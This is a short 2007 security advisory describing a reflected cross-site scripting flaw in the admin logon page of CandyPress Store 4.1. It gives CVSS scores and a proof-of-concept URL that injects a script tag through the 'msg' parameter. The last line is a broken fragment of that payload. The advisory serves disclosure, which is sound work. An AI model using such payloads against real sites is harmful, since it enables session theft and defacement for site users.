CandyPress Store 4.1 - XSS

2007-10-21 / 2007-10-22
Risk: Low
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Product : CandyPress Store Version : 4.1 Bug Kind:XSS Vendor Site: Discovered by: Snoop Security Researching Committee We Are: it's an ssshh!!! no one know us... This Bug blog to : Snoop Security And darkness_king !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ About Candypress: CandyPress Store is an eCommerce solution based on popular Microsoft technologies. It is designed to run on an IIS web server that is ASP and VBScript enabled. In addition, the software is designed to work with SQL Server or MS Access databases. The Bug is affected in here:/admin/logon.asp?msg=Snoop Security also this way:/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E some example vuln pages:'snoop%20security');%20%3C/script%3E

